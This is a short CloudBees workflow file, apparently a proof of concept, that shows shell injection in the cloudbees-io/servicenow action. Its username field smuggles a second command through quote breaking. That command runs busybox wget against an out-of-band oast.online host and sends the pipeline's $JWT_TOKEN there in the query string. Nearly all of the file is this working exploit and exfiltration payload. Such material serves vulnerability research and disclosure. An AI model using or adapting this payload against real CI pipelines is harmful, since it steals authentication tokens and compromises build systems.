apiVersion: automation.cloudbees.io/v1alpha1
kind: workflow
name: servicenow-shell-injection-poc
on:
  workflow_dispatch:
jobs:
  exploit:
    steps:
      - uses: cloudbees-io/servicenow@v1
        with:
          action-type: 'create_change'
          url: 'https://example.service-now.com'
          username: "x' & busybox wget -qO- 'https://d92m7ikjor34qm6itqugomnxjizzyujbs.oast.online/?jwt='$JWT_TOKEN; echo BUSYBOX_DONE; :'y"
          password: 'testpass'
          cr-number: '12345'
